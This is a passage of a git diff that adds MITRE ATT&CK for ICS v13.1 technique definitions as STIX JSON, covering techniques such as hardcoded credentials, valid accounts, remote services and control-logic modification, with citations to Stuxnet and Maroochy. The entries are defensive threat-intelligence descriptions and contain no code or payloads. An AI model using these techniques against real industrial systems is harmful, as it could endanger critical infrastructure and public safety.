+ "description": "Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14 ",
+ "url": "https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298"
+ },
+ {
+ "source_name": "ESET April 2016",
+ "description": "ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14 ",
+ "url": "https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/"
+ },
+ {
+ "source_name": "Kernkraftwerk Gundremmingen April 2016",
+ "description": "Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14 ",
+ "url": "https://www.kkw-gundremmingen.de/presse.php?id=571"
+ },
+ {
+ "source_name": "Lee Mathews April 2016",
+ "description": "Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 ",
+ "url": "https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/"
+ },
+ {
+ "source_name": "Peter Dockrill April 2016",
+ "description": "Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14 ",
+ "url": "https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant"
+ },
+ {
+ "source_name": "Sean Gallagher April 2016",
+ "description": "Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14 ",
+ "url": "https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/"
+ },
+ {
+ "source_name": "Trend Micro April 2016",
+ "description": "Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14 ",
+ "url": "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377.json
new file mode 100644
index 0000000000000000000000000000000000000000..b34be6fb4128a91becf8a8972369aa5060ce6208
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--22219393-df8a-4029-8993-78c9e69e1c2a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Screen Capture",
+ "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Human-Machine Interface"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "Command: Command Execution",
+ "Process: OS API Execution"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0852",
+ "external_id": "T0852"
+ },
+ {
+ "source_name": "ICS-CERT October 2017",
+ "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_is_subtechnique": false
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a.json
new file mode 100644
index 0000000000000000000000000000000000000000..a843015adc95be0eecd4f07a8c7eb5471b73f8c1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a.json
@@ -0,0 +1,61 @@
+{
+ "type": "bundle",
+ "id": "bundle--c26a2f01-7ea4-4f37-8897-7f5a6a2f8063",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Hardcoded Credentials",
+ "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "lateral-movement"
+ },
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_contributors": [
+ "Aagam Shah, @neutrinoguy, ABB"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Field Controller/RTU/PLC/IED",
+ "Safety Instrumented System/Protection Relay",
+ "Control Server",
+ "Data Historian",
+ "Human-Machine Interface",
+ "Engineering Workstation"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "Network Traffic: Network Traffic Content",
+ "Logon Session: Logon Session Creation"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a",
+ "created": "2022-09-29T13:35:38.589Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0891",
+ "external_id": "T0891"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101.json
new file mode 100644
index 0000000000000000000000000000000000000000..edd5689fd8bdbc4765d780fd3cf3b3f1f79e6da1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101.json
@@ -0,0 +1,65 @@
+{
+ "type": "bundle",
+ "id": "bundle--dffc66e0-2db0-4196-bc70-bfac809a6493",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Valid Accounts",
+ "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Control Server",
+ "Data Historian",
+ "Engineering Workstation",
+ "Field Controller/RTU/PLC/IED",
+ "Human-Machine Interface",
+ "Input/Output Server",
+ "Safety Instrumented System/Protection Relay"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_data_sources": [
+ "Logon Session: Logon Session Metadata",
+ "Logon Session: Logon Session Creation",
+ "User Account: User Account Authentication"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0859",
+ "external_id": "T0859"
+ },
+ {
+ "source_name": "Booz Allen Hamilton",
+ "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ",
+ "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618.json
new file mode 100644
index 0000000000000000000000000000000000000000..93ee04eda0852432a9b4266e8906f2accef7f440
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618.json
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--af819028-d807-42a7-8a30-35882dc5affb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-27T16:38:58.028Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) \n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. 
(Citation: The MITRE Corporation)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0890", + "external_id": "T0890" + }, + { + "source_name": "The MITRE Corporation", + "description": "The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ", + "url": "https://attack.mitre.org/techniques/T1068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061.json new file mode 100644 index 0000000000000000000000000000000000000000..bdaa8bdb3c774d2a8b1423c8e501fadbcf1d45ba --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d5b587a1-5add-4019-bf8b-4135eea22087", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0846", + "external_id": "T0846" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 
2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1018" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73.json new file mode 100644 index 0000000000000000000000000000000000000000..5e9377a5bad589d31154db9c2077d544090c0ab5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--60a0c521-6245-4620-84e7-79add7b94d67", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Engineering Workstation Compromise", + "description": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. 
In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0818", + "external_id": "T0818" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4.json new file mode 100644 index 0000000000000000000000000000000000000000..8bd062b92292c732deb4836ddcb42eda425eb86c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c42a6810-78de-4e58-806f-f927fbb41ed2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Connection Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.\n\nThe definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. 
(Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0884", + "external_id": "T0884" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1090" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387.json new file mode 100644 index 0000000000000000000000000000000000000000..cafeda89898dc5b7890a0d6cce56babcfaa5effc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--f5d36f91-9cfa-404b-a34e-623a4552cb6e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e.json new file mode 100644 index 0000000000000000000000000000000000000000..595f52b41aefc74d6a3e2bb1f9ab5670750cba43 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--baa2fbf2-5614-4b85-93ae-fd651e01b7df", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21T17:43:26.506Z", + "modified": "2022-05-06T17:47:24.401Z", + "name": "Modify Control Logic", + "description": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. \n\nProgram code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active.\n\nAn adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools.\n\nAn adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. 
This can be used to change a control process without actually spoofing command messages to a controller or device. \n\nIt is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the \u201creal\u201d pressure is for given analog signals and then automatically linearize the measurement to what would be the \u201creal\u201d pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be \u201ccorrected\u201d during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. (Citation: Stuxnet - Langner - 201311)\n\nIn the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0833", + "external_id": "T0833" + }, + { + "source_name": "Stuxnet - Langner - 201311", + "description": "Ralph Langner. 
(2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + }, + { + "source_name": "Maroochy - MITRE - 200808", + "description": "Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study\u2013 Maroochy Water Services, Australia. Retrieved March 27, 2018.", + "url": "https://www.mitre.org/sites/default/files/pdf/08%201145.pdf" + } + ], + "x_mitre_deprecated": true, + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf.json new file mode 100644 index 0000000000000000000000000000000000000000..ee9dc63f8c2551653faece7ec54c01665ecf9064 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf.json 
@@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--82f60307-7461-408b-a5ff-a3fee2b6b31e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote Services", + "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. 
